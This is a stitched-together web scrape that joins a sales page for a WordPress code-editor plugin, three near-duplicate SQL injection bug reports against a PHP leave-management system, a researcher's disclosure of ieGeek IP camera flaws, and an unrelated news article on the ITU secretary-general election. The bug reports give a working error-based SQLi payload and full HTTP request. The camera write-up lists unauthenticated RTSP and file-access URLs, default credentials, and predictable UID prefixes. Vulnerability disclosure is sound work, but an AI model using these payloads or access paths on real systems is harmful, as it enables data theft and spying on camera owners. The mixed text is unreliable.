The Scripts Organizer WordPress plugin before 3.0 does not have capability and CSRF checks in the saveScript AJAX action, available to both unauthenticated and authenticated users, and does not validate user input in any way, which could allow unauthenticated users to put arbitrary PHP code in a file

**Advanced Code editor for WordPress**

See Pricing

**Featured at:**

**Features List**

**Live Preview**

No need to have the website in a new tab and constantly reload the browser to see the changes. Press CTRL + S and reload changes on every save. Read more

**Add custom functionality to your WordPress by writing SCSS, CSS, JavaScript, PHP**

With Scripts Organizer you can write CSS, Java Script, HTML and PHP. The Header and the Footer blocks are HTML based and wrap scripts and styles in closing tags. In… Read more

**Safe mode**

No more fear for last-minute online edits. In case of something go wrong we got your back. After every save we are checking if the script is correct and in… Read more

**SCSS Partials**

Long CSS files can be long and important parts can not be reused. The solution to this is it split your CSS into parts and merge it with Scripts Organizer.… Read more

**Inject CSS and JS Location in Header or Footer**

By default when you create Code Block and you choose JS, CSS, or SCSS code will be generated as inline Script or Style. And that is great if you are… Read more

**Insert Oxygen's Global Colors**

Include Oxygen’s colors with only 1 click. No need to recreate or remember hex values anymore. Color will be included as Oxygen Builder native variable same as you would write… Read more

**Schedule Script Date**

Daily Easies way to explain this is that daily setting will be run every day without interruptions or any limit. Days This option will unlock the section below to choose… Read more

**Schedule Script Time**

All Day By the default “All Day” is selected and script will be running all day from 00:00 to 24:00. Time This option will unlock the section below to choose… Read more

**Scripts Manager**

With this powerful feature, you will be able to enqueue and register scripts and styles and trigger them the same way as any other code you are writing inside Scripts… Read more

**Exclude Conditions**

Have the option to select the entire website except: “Post types, Handpicked single posts, Taxonomies, or Terms.” Read more

**Code Editor**

With version 2.0 and above you will get Full Visual Studion code experience. We have integrated Monaco and with that, you will have a feeling like you never left the… Read more

**Export-Import**

Scripts Organizer We are using native WordPress post logic and with this, you can use WordPress post or pages “Export-Import” plugins. Having an extra plugin is a hassle so we… Read more

**Code Navigator**

Navigate fast between code blocks with sidebar list without leaving code editor. Code Navigator is available for Code Blocks and SCSS Partials. Code Block Navigator preview Code Block Navigator preview… Read more

**Organize Scripts**

Scripts List Since Scripts Organizer is WordPress native-oriented you can manage scripts the same as any other post or page. In the Scripts list, you can sort them by title… Read more

**Scripts Location**

What differs Scripts Organizer from others is that you can write Scripts and Styles inside Header and Footer and on top of that to write PHP Action or Hook or… Read more

**Shortcode**

Use flexibility to create one group of elements and reuse it across the website. Shortcode can be scheduled the same as scripts and styles. For best practice we limited shortcode… Read more

**Current Server Time**

When you are preparing scripts when to be triggered at an exact time it is important that your plan is synchronized with server time. This is especially important when you… Read more

**WordPress Native under the hood**

We are reusing using WordPress scripts, styles, classes, and functions to get the most of performance as you already loaded everything. With WordPress native look and feel learning curve will… Read more

**Themes**

Looking at the code all day long is hard so we are making constant improvements. From Dark to Light mode to switch between night and day for better contrast to… Read more

**Easy way to enable-disable scripts**

Scripts can be easily enabled-disabled by pressing toggle switch on two locations. The first one is when you editing the Scripts page. Scripts Planner > Scripts pages list > Selected… Read more

**REVIEW FROM WP EXPERTS**

_This is a very powerful plugin. Not only is it feature-rich and offers all the functionality I need, but it literally works every day for me that I use it. Developers are always listening to user suggestions, and by making changes regularly as they’re suggested, they make sure my experience stays strong. I am very pleased and lucky to have this plugin for my workflow._ 

**Andrew Choi**

Scheduling scripts on your WordPress site has never been more straightforward. With Scripts Organizer, you can schedule to run scripts (HTML, CSS, JS & PHP) only where they are needed when they are needed. Add CSS tweaks over Halloween & Black Friday for Visual Themeing or run your chatbot only during your working hours. You can pick a timeframe, select specific dates, weekdays, taxonomies & more. The scripts of your choice will be running only on the pages that match all of your specified conditions. Scripts Organizer gives you the power to schedule scripts in no time.

**Noel**

I was an early adopter of Swiss Knife Pro and Scripts Organizer and have had the privilege of watching both plugins mature into incredibly helpful tools. Both offer a unique set of features dedicated to saving WordPress creators time and augment the development experience. Aside from the features, the development and support are both best in class. The dPlugins team consistently pushes major and minor updates with helpful features, cosmetic improvements, and more. They have an active community of users and happily integrate popular requests that help users of their plugins. Support queries are answered quickly, professionally, and most importantly… actually help you solve your problem. As a WordPress Agency that uses Oxygen Builder for almost all of our projects, Swiss Knife Pro and Scripts Organizer have saved my team at Isotropic hundreds of hours in manual work, from debugging, to font management, to scheduling mission-critical scripts, and more!

**James LePage**

It paid off when I was going for my last vacation. I have scheduled a promotion banner and left my computer at home. That’s how much I trust him.

**Alexander Buzmakov**

**Unlimited websites****Unlimited support****Documentation and support****More features coming soon**

**Lifetime updates and support**

Price will rise as we add more features

**$65.00**

Buy Now:  $65.00

Payments are secured with Stripe and PayPal

**30-Day Money-Back Guarantee**

Probably you will never need this with our owesome products but here it is just in case. If you aren’t completely satisfied within 30 days of purchase, you’re more than welcome to get a full refund!

Contact support

CVE-2021-24890: Scripts Organizer | dplugins.com

Online Leave Management System v1.0 is vulnerable to SQL Injection via /leave_system/classes/Master.php?f=delete_leave_type.

Permalink

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Tmoont

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

Vulnerability File: /leave\_system/classes/Master.php?f=delete\_leave\_type

Vulnerability location: /leave\_system/classes/Master.php?f=delete\_leave\_type,id

dbname=leave\_db,length=8

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /leave\_system/classes/Master.php?f\=delete\_leave\_type HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=maintenance/department
Content-Length: 65
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40926: Bug_report/SQLi-2.md at main · admin77888/Bug_report

Online Leave Management System v1.0 is vulnerable to SQL Injection via /leave_system/classes/Master.php?f=delete_designation.

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Tmoont

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

First create a table in the database

CREATE TABLE \`designation\_ist\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /leave\_system/classes/Master.php?f=delete\_designation

Vulnerability location: /leave\_system/classes/Master.php?f=delete\_designation,id

dbname=leave\_db,length=8

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /leave\_system/classes/Master.php?f\=delete\_designation HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=maintenance/department
Content-Length: 65
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40927: Bug_report/SQLi-1.md at main · admin77888/Bug_report

Online Leave Management System v1.0 is vulnerable to SQL Injection via /leave_system/classes/Master.php?f=delete_application.

Permalink

Cannot retrieve contributors at this time

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Tmoont

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

Vulnerability File: /leave\_system/classes/Master.php?f=delete\_application

Vulnerability location: /leave\_system/classes/Master.php?f=delete\_application,id

dbname=leave\_db,length=8

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /leave\_system/classes/Master.php?f\=delete\_application HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=maintenance/department
Content-Length: 65
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40928: Bug_report/SQLi-3.md at main · admin77888/Bug_report

ieGeek IG20 hipcam RealServer V1.0 is vulnerable to Incorrect Access Control. The algorithm used to generate device IDs (UIDs) for devices that utilize Shenzhen Yunni Technology iLnkP2P suffers from a predictability flaw that allows remote attackers to establish direct connections to arbitrary devices.

*   ieGeek IG20 Issues/Vulnerabilities
    *   UID Weakness CWE-340
    *   Unauthenticated / Default auth access to camera stream via RTSP protocol CWE-284
*   Default P2P Camera feed activated and sent to a server in plaintext CWE-284
    *   Access to files stored on the camera CWE-284
*   Admin Panel – Basic Authentication in use / Weak Password Requirements CWE-521 / CWE-287
*   JavaScript injection (DOM-based) CWE-79
*   HTTP Response Header Injection/Splitting CWE-644
*   Device NMAP scan
*   The Listing On Amazon
*   Update 01 Sep 2022 – Product Still Listed On Amazon
*   Update: 01 Sep 2022
*   Consumer Recommendations
*   Q&A
    *   Are ieGeek cameras secure?
    *   What are the real risks of ieGeek cameras?
*   Cheap CCTV Invites Outside Threats Into Your Home\[4\]
*   References
    *   Please login to bookmark
    *   Don’t miss:

**_Amazon’s “highly rated” ieGeek brand continues to present a number of security vulnerabilities._**

On the 19th of Aug 2022 I set out to purchase a CCTV Camera from Amazon, I read over the reviews of the ieGeek IG20, and it seemed great, the value too. For just £29.99 I’d get myself a great looking CCTV Camera, packed full of features. It has night vision, Smartphone access, Motion Detection, Plug & Play, It’s waterproof and it can connect via WiFi or Ethernet. Great, I was sold. However, I failed to do any research on the brand specifically.

The camera arrived the following day, and later that day I got around to setting it up. I first noticed that on the back of the camera, there was a sticker with a UID printed, along with a Factory default Username & Password combination, consisting of admin/admin.

**UID Weakness CWE-340**

The UID appears to be predictable.The UID in our case, will look like this: **_AAFF-123456-ABCDE_** – depending on the make and model.

*   **UID p1**: _Same 4 letters at the start._
*   **UID p2:** _6 numbers at random in the middle._
*   **UID p3**: _5 random letters at the end._

Evidently, having just this basic knowledge of the UID and using the default credentials, the camera feed could be accessed using the software provided by ieGeek from their website by testing each UID value. This can leave a number of IP cameras vulnerable to unauthorised viewing with the privacy of users at risk.

Below are some more vulnerable prefixes running the same crappy firmware.

AAAA

AABB

AACC

AAES

AIPC

AAFF

BBBB

CAM

CAMERA

CCCC

DDDD

DEAA

EEEE

ELSA

ELSO

ESCM

ESN

ESS

EUA

EYE

FCARE

FDTAA

FFFF

FOUS

GCAM

GCMN

GGGG

GKW

HHHH

HRXJ

HSL

HVC

HWAA

HZD

HZDA

HZDB

HZDC

HZDN

HZDX

HZDY

HZDZ

IIII

ISRP

JWEV

MCI

MDI

MEIA

MMMM

MSE

MSI

MTE

NIP

NNNN

NTP

OBJ

PHP

PISR

POLI

PPCN

PPPP

PTP

QSHV

ROSS

SECRUI

SPCN

SSAA

SSSS

SURE

SXH

TTTT

UUUU

VIEW

VSTA

VSTB

VSTC

VSTD

VSTF

WCAM

WGKJ

WHI

WNR

WNS

WNV

WWWW

WXH

WXO

XCPTP

XHA

XLT

XWL

ZLD

ZZZZ

AVA

**Unauthenticated / Default auth access to camera stream via RTSP protocol CWE-284**

By default, one can easily access the camera’s stream externally or internally depending on your router/network configuration, with our without means of Authentication.

*   **Zero Authentication:** rtsp://+IP+/11
*   **Default Auth:** rtsp://admin:\[email protected\]+IP+/11

_**Replace +IP+ with your local or external IP**_.

Here is a screenshot of the Default RTSP settings, requiring Zero authentication.

**Default P2P Camera feed activated and sent to a server in plaintext CWE-284**

The cloud function of the camera uses the P2P protocol to send and make requests back to a server based in China in plaintext. It was found that all connections back to this were made in plaintext regardless of protocol, this includes the viewing of the camera’s stream and control. HTTPS was not found to be implemented anywhere on the camera.

**Access to files stored on the camera CWE-284**

The following directories can be viewed using the default login:

*   http://+IP+/tmpfs
*   http://+IP+/js
*   http://+IP+/lib
*   http://+IP+/log
*   http://+IP+/resources
*   http://+IP+/sd
*   http://+IP+/swfs

The number of links discovered showed that the SD card, log files and website front-end code were accessible from the web interface. This includes any footage that has been recorded by the device and stored on the external SD card.

I decided to check out shodan.io and searched for “hipcam realserver”. Shodan is a Google like database of Connected Devices, if you like. It produced 93,312 results of addresses that had port 554 exposed to the internet. As I browsed these I also discovered a number of addresses that also had Port 80 exposed, hosting the same ‘IP Camera’ front page with login. With what I have discovered it is possible for each of these devices to be accessed via default credentials, or if the admin credentials are changed, Using VLC player, I could potentially connect to each of these camera streams without the need to authenticate.

**Admin Panel – Basic Authentication in use / Weak Password Requirements CWE-521 / CWE-287**

When the camera is booted up, a web server is spawned and requires a login to gain access. Default credentials were then used to gain access and there was no setup to force change of the default password in place. Burpsuite caught this login process; the session was found to be using HTTP Basic Authentication to handle the username and password. The Base64 translates to admin:admin.

**JavaScript injection (DOM-based) CWE-79**

Data is read from **document.cookie** and passed to **eval()**

    
    var strCookie=document.cookie;
    var arrCookie=strCookie.split('; ');
    var arr=arrCookie[i].split('=');
    return unescape(arr[1]);
    var cooktype=getcookie('cookmun');
    var string = eval("'cgi-bin/hi3510/param.cgi?cmd=setimageattr&-image_type="+cooktype+"&-default=on'");

Using various different methods of escaping. Stored XSS was also prevalent in many places within the admin panel that used user input. Example: FTP Upload settings.

**HTTP Response Header Injection/Splitting CWE-644**

The web application is also evidently vulnerable to HTTP response header injection, see PoC below. This also led me to discover i was able to break out of the response.

Your options for exploitation vary depending on the type of response you’re injected into and also where in the response you’re placed!

Here we’ve added a “malicious cookie” which will be set in the browser. As mentioned earlier i was also able to break into the body, or out of the headers through double CRLFs (%0d%0a%0d%0a) **_see below_**.

When user input is insecurely inserted into the headers of server responses, HTTP Header Injection vulnerabilities are created. They are based on the theory that an attacker can make the server generate a response that contains carriage-return and line-feed characters (or, respectively, %0D and %0A in their URI encoded forms), within the server response header, and/or that the attacker may be able to add specially created headers. Attacks like response splitting, session fixation, cross-site scripting, and malicious redirection are all possible using header injection.

Often, the injection of headers is not the main attack; rather, it is merely a method for accessing or exploiting another flaw. For instance, if a hacker is able to inject a payload through HTTP header injection, they may target a website that is susceptible to cross-site scripting in the Referer header or in a cookie value etc.

**Device NMAP scan**

    Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-28 00:42 BST
    Nmap scan report for 192.168.1.116
    Host is up (0.0088s latency).
    Not shown: 996 closed ports
    PORT     STATE SERVICE
    80/tcp   open  http Hipcam RealServer/V1.0
    554/tcp  open  rtsp
    1935/tcp open  rtmp Real-Time Messaging Protocol
    8080/tcp open  http-proxy ONVIFservice
    MAC X (Shenzhentong BO Weitechnology) SHENZHEN TONG BO WEI TECHNOLOGY Co.,LTD
    Device type: general purpose
    Running: Linux 2.6.X|3.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
    OS details: Linux 2.6.32 - 3.10
    Network Distance: 1 hop
     

Anyway, I decided enough is enough with this trash device and unplugged it from my network, packaged it back up and arranged a return with Amazon.

**The Listing On Amazon**

At the time of writing, the listing is still available, however, I reached out to Amazon and made them fully aware of everything, including my intention to publish this article, and they advised me that the product listing would be “temporarily” removed today, **28th Aug 2022**, pending further Investigation.  
The listing can be seen here **_\[if still available\]_**

It has to be worth noting, that there was an investigation by Which.co.uk see reference \[3\] in July 2021, that details a line of similar flaws, consequently, Amazon removed the said ieGeek branded camera from sale on its website. The which? investigation revealed another device from the same manufacturer can be easily hacked by cybercriminals.

> The £40 camera, which was labelled Amazon’s Choice, had more than 8,500 reviews (as of June 22 2021), including 68% giving the full five stars.
> 
> If you own the ieGeek Security Outdoor Camera 1080p, you should change its default password immediately, or better still, stop using it.
> 
> https://www.which.co.uk/news/article/iegeek-security-camera-removed-from-sale-following-which-investigation-ajW4t0g7bnGj

So the question remains, why do Amazon allow Manufacturers to list products irrelevant of the manufacturer having been Flagged, and Delisted in the past? A better system needs to be in place. Yes, I understand there can be a new line of products/models but surely amazon should be seen to be doing more to prevent devices like this from appearing on their website. The privacy and security of their customers should be paramount.

**Update 01 Sep 2022 – Product Still Listed On Amazon**

We’ve noted that the product is still available to purchase on Amazon, despite us being told that it would be removed, pending an investigation. We figured we’d add a screenshot, just for clarity.

Here is the screenshot of a mail I received from the Amazon Representative on the 28th of August, this email states the item “may be temporarily unavailable”, which contradicts what she told me on the telephone. This email arrived in my mailbox very shortly after I had a call with the same lady, Roxy.

**Update: 01 Sep 2022**

We’ve been made aware of another article from Which.co.uk, this second article was published in late 2021, after the earlier-mentioned article. Their second write-up clearly paints a very different picture, one could easily say it’s misleading given what has been uncovered in this report. It has to be worth mentioning that my ieGeek device, and probably many many others, was still running the same vulnerability-ridden firmware that Which.co.uk spoke out against in their first write-up, as has been verified by the team here at risec and elsewhere. There was no obvious offer of any firmware upgrade, at least to my knowledge. Anyway, see some quotes from the second write-up below.

> **Millions of CamHi wireless cameras made more secure after hacking risk**
> 
> Following a change by HiChip, all CamHi app devices when installed now must have their default password changed by the user.
> 
> HiChip has agreed to enforce a strong password policy, particularly blocking generic terms such as ‘password’ and ‘admin’.
> 
> For CamHi devices that are already set up in people’s homes, the app will remind them to change the default password and warn them if what they have chosen is weak
> 
> **_MISLEADING_**: https://www.which.co.uk/news/article/millions-of-camhi-wireless-cameras-made-more-secure-after-hacking-risk-aezzW2u2ELsl

**_We have reached out to Which.co.uk and have yet to receive any notable response._**

**Consumer Recommendations**

If you value your privacy, and security as much as we do, please remove the device from service. It is simply unfit for purpose. If you bought it from Amazon, go and arrange a return as this device is in clear breach of their merchant conditions.

Research each device thoroughly before buying, and check it’s security reputation.

_**Be Aware**_**_:_** _Endless numbers of IP cameras of other Brands also use the Hipcam RealServer service; I am unable to check the configuration of these devices specifically, but one would be led to believe they are all implemented similarly. Sadly, there doesn’t seem to be a method to warn anyone utilising these IP Cameras that they are exposed._

On a final note, take amazon’s reviews with a pinch of salt, and always do your homework. Next time your about to purchase a connected device, IoT(Internet-of-Things), do a quick google query, something like, “vulnerable BRAND” or “exploit BRAND”

**Q&A****Are ieGeek cameras secure?**

According to our research, and many others, ieGeek cameras are not secure. The devices they seem to be pushing out in 2022 are vulnerable in a number of ways as detailed in this article. Fundamentally, they lack proper encryption, and, are shipped to consumers riddled with security holes. One can only ask themselves, is it intentional? _**tldr; Given the research of the team here at RiSec, and research conducted elsewhere, we can categorically say ieGeek’s cameras are not secure in 2022.**_

**What are the real risks of ieGeek cameras?**

By using these devices that lack proper safety and security standards, your private data is at serious risk of being exposed, **a bad actor may able to gain complete control of the cameras**. This fundamentally opens up your entire network to further attack, making it much easier for a bad actor to reach an end goal.

Cheap CCTV cameras tend to be vulnerable to at least one of the following types of hacking:

1.  They have a weak default password and username setting, which can be easily discoverable. If the user doesn’t change those settings, it’s very easy for hackers to find their way into your camera control system, in every case, there is no prompt in the Admin panel when logging in, advising you to chase any password.
2.  They don’t encrypt your data so that your home router password input is un-encrypted and accessible to any cyber attacker, or themselves.., same applies with any SMTP email info provided, along with any FTP info provided to the device. By using the home router password, they can gain access to other devices on your home network, can monitor your Internet history and any stored data on connected devices.
3.  They let external users gain root access to the device itself, allowing hackers to take control, launch attacks from your device, and exfiltrate data.

**Cheap CCTV Invites Outside Threats Into Your Home\[4\]**

> There are three main security issues you need to look for when buying your CCTV camera. Popular wireless security camera brands that are sold on online marketplaces like Amazon, but also eBay share common security flaws.
> 
> As a rule of thumb, brands that are not well-known outside of the online market should be avoided at all cost. Affordable CCTV solutions from Shenzhen-based factories in China sometimes fail to meet wireless safety standards.
> 
> Brands that have been tested for vulnerability and that you should avoid are the following; ieGeek, Sricam, SV3C, and Vstarcam. All come with a friendly price tag, but they are quick to join the list of CCTV cameras that put your privacy and security at risk.
> 
> Tested by a professional security lab, Context Information Security, “cheap CCTV cameras show that they fail to prioritise customers’ security even those that are bestsellers in online marketplaces”
> 
> \[4\]

Update: **_21/09/2022_** – After some back-and-forth correspondence with the vendor, **_ieGeek_**, they have disputed that the ieGeek IG20 is an insecure device, despite our evidence to the contrary, they also cited an invalid misleading Which.co.uk\[5\] post as seen above.

**CVE Approved:** **_CVE-2022-38970_**\[6\]

**_Got some crazy story? thoughts on this article? We’d love to hear from you below!_**

_Coming up next, I will be covering a Chinese “Mini-PC” that was shipped to me loaded with Malware._

Ciao, for now.

**_References_**

Amazon product listing\[1\]

IG20 ieGeek store page\[2\]

Which investigation ieGeek\[3\]

Cheap CCTV Sold With Known Vulnerabilities\[4\]

Which.co.uk Misleading\[5\]

**_CVE-2022-38970_**\[6\]

Suggest an edit to this article

Go to Cybersecurity Knowledge Base

Got to the Latest Cybersecurity News

Go to Cybersecurity Academy

Go to Homepage

_Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today_.

**_Remember,_** _CyberSecurity Starts With You!_

*   Globally, **30,000 websites** are hacked daily.
*   **64% of companies** worldwide have experienced at least one form of a cyber attack.
*   There were **20M breached records** in March 2021.
*   In 2020, ransomware cases grew by **150%**.
*   Email is responsible for around **94% of all malware**.
*   **Every 39 seconds,** there is a new attack somewhere on the web.
*   An average of **around 24,000 malicious mobile apps** are blocked daily on the internet.

Bookmark

**Please login to bookmark**

No account yet? Register

*   About
*   Latest Posts

Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK.

I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated...

I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK.

I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

Share the word, let's increase Cybersecurity Awareness as we know it

CVE-2022-38970: ieGeek Vulnerabilities still prevalent in 2022 - Amazon Ft. IG20

UN countries are preparing to pick a new head of the International Telecommunications Union. Who wins could shape the open web's future.

This week in Romania, a US State Department candidate is facing a Russian challenger in an election for the leadership of one of the most important international technology bodies in the world.

Who wins could determine whether the internet remains a relatively decentralized and open platform—or begins to centralize into the hands of nation-states and state-run companies that may want great control over what their citizens see and do online. Yet, with just days to go before the vote, the race for secretary-general of the International Telecommunications Union (ITU) has garnered painfully little attention.

It’s a two-person race: On one side is the American, Doreen Bogdan-Martin, a former Commerce Department expert on telecommunications who joined the ITU in the 1990s. She’s squaring off against Rashid Ismailov, the former deputy minister for Russia’s telecommunications ministry.

According to their election platforms, Bogdan-Martin and Ismailov signal the same core objective: connecting every person in the world to the internet and cellphone service by 2030. The two candidates, however, represent fundamentally different visions for the future of the internet. Bodgan-Martin’s campaign has focused on her track record of navigating the complex machinery of the United Nations body. Ismailov, meanwhile, has promised a “humanization” of telecommunications infrastructure—and has invoked his candidacy as a way to reject American “dominance” online.

If the wrong candidate wins, says Göran Marby, head of Internet Corporation for Assigned Names and Numbers (Icann), the stakes couldn’t be higher: “People around the world might not be able to connect to one single interoperable internet.”

Today, the ITU technically sits under the auspices of the United Nations. But it predates the world’s major deliberative body by about 80 years.

Originally established to do things like standardize the Morse code alphabet and codify the standard distress call, the ITU is today responsible for creating standards and interoperability between an array of services and technologies and expanding access to modern communications platforms.

Maintaining interoperability is an unsung but critical job. The ITU needs to ensure that all countries can agree on allocating space on the radio frequency spectrum, and it assigns orbital slots to various communication satellites, amongst other tasks. For example, the ITU is the reason a Japanese cellphone can still work in Dakar, and vice versa.

Unlike other UN bodies, the ITU is not merely the purview of nation-states: Its members include 190 nation-states, as well as 900 corporations, research bodies, and NGOs. (Only nations can vote in leadership elections, however.) For the past eight years, the organization has been led by Secretary-General Zhao Houlin, who had been rising in the ranks of the sprawling ITU bureaucracy since he left the Chinese telecommunications ministry in 1986.

Kristen Cordell, an adjunct fellow at the Center for Strategic and International Studies (CSIS), has called the ITU “the most important UN agency you have never heard of.” Decisions made at the international body, she argued, “have a tremendous impact on the everyday lives of Americans.”

Authoritarian states like China, Cordell wrote, “have increased their interest and activism in the ITU, leading to concerns that their outsized influence in standards setting may lead to the bifurcation of the internet.” Houlin’s time at the helm of the organization, according to Cordell, has been marked by “highly favorable comments and decisions in support of Chinese companies.” Those companies have, in turn, ramped up their involvement in the ITU. Huawei alone has submitted some 2,000 new standards proposals to the organization, according to Cordell.

In 2019, Houlin signed a memorandum of understanding between the ITU and the Export-Import Bank of China to expand internet access through the Global South under China’s signature Belt and Road Initiative. The initiative has been criticized as a form of neocolonialism: hooking up countries, particularly in Africa, to high-interest loans that leave them beholden to Chinese investment.

Proposals from Chinese state enterprises and from Beijing itself suggest, in their words, a “New IP” and are purportedly a response to a lack of innovation in how data is processed at the lowest levels of the internet. China has suggested that tagging data packets by their intended purpose could improve data routing and reduce latency. Beijing, in ITU proposals, offers altruistic examples, like prioritizing streaming data associated with virtual surgeries.

Critics, however, say the issues diagnosed by China are already being addressed and that such a proposal would likely worsen these fundamental problems, not improve them. The Internet Society, a US-based nonprofit that promotes internet openness, derided the proposal as one likely to make those identified problems worse and said it ignores progress in making the patchwork of different systems and operators play well with each other. “Creating overlapping work is duplicative and costly. In the end, it does not enhance interoperability,” wrote Internet Society analysts Hascall Sharp and Olaf Kolkman.

Many see an ulterior motive. This new balkanized internet “would lack free and open standards and be primed for manipulation by autocrats that seek to limit civil liberties and human rights,” Cordell argues.

“The internet, at its lowest level, should be data-agnostic,” says Mallory Knodel, chief technology officer at the Center for Democracy & Technology. There is “less information control if the data is agnostic,” she says.

“New IP would centralize control over the network into the hands of telecoms operators, all of which are either state-run or state-controlled in China,” reads a 2020 report from Oxford Information Labs, prepared for NATO and obtained by _Infosecurity Magazine_. “So, internet infrastructure would become an arm of the Chinese state.”

Members of the ITU have largely shot down these proposals for New IP. But that doesn’t mean China is giving up.

Fiona Alexander, a cofounder of Salt Point Strategies who is also part of the American delegation to the ITU, points out that there is a “sleight of hand” going on with some of the authoritarian regimes as they advance proposals like New IP—most recently, China has rebranded that proposal to the innocuous-sounding “IPV6+.”

China has acknowledged that increased central control is, in its view, an upside of these proposals. “States have the right to make ICT-related \[information and communications technology\] public policies consistent with national circumstances to manage their own ICT affairs and protect their citizens’ legitimate interests in cyberspace,” reads a set of 2019 submissions written by Beijing.

This kind of work is, traditionally, not the purview of the ITU. Nongovernmental groups, like Icann and the Internet Engineering Task Force (IETF), tend to be more directly responsible for managing the actual protocols that govern the internet.

The Russian candidate to replace him, Ismailov, is no stranger to China’s international policy: He spent three years as a regional vice president at Huawei. From there, Ismailov rose through the ranks of the Russian Ministry of Telecom and Mass Communications before joining Nokia and later Russian telecommunications firm PJSC VimpelCom.

Beijing and Moscow have made no secret of the fact that they’re on the same page at the ITU.

A 2021 pact between Beijing and Moscow committed both countries to flexing their muscle when it comes to international technology governance, with an eye to “preserving the sovereign right of States to regulate the national segment of the Internet.”

“Russia and China emphasize the need to enhance the role of the International Telecommunication Union and strengthen the representation of the two countries in its governing bodies,” the agreement concludes.

Ismailov has been transparent that his view of the organization stands in stark contrast to that of his American competitor.

“Americans are, perhaps, allergic to everyone who has anything to do with Huawei,” Ismailov said in his official, 30-minute campaign video. “I don’t understand why this has happened.” He added that the “demonization” of the Chinese company was done, in his view, “out of fear of competition.”

While Ismailov said he would “strive to avoid this politicization” of the organization, he also pledged to defend Russia against consequences levied for its war in Ukraine.

“I want to make sure that the organization focuses more on its actual objectives—frequencies standardization, etc,” he said, through a translator, in his campaign video. “Of course this won’t be totally possible because technology is now an integral part of our everyday life, including geopolitics. We are seeing this with the sanctions that are being imposed. Russia is being pressured in all international organizations—some want to strip it of its voting rights, others want to expel Russia.”

In a press conference in May, Ukraine’s head of the State Special Communications Service, Yurii Shchyhol, said his country had moved to sanction Russia at the ITU as a denouncement of its invasion of Ukraine—what Ismailov euphemistically refers to as a “special military operation.”

If she wins, Bodgan-Martin will be the first woman to lead the ITU—she will also be the first American to lead the organization since 1965. While the State Department says Bodgan-Martin’s candidacy is a matter of having “the right candidate at the right time,” her bid for the job is no accident.

Houlin’s first candidacy for the secretary-general position, in 2014, went unopposed. In 2017, the Trump administration unveiled its National Security Strategy: a hodgepodge of tactics to counter China’s rising influence in the world. In it, the White House identified the protection of a free and open internet as a top priority and set “active engagement in key organizations” as necessary measures, mentioning the ITU by name.

Yet at the 2018 ITU Plenipotentiary Conference, Houlin again ran unopposed—his re-election bid was supported by 176 of the 178 countries present.

Ahead of the vote on September 29, at this year’s conference in Bucharest, the United States seems to be taking the race seriously. Members from the American delegation, as well as a senior official at the State Department who spoke on the condition of anonymity, said Bodgan-Martin has been campaigning intensely. A litany of photos posted to Twitter, and a surprisingly active hashtag, show her meeting with technical and civil society groups around the world.

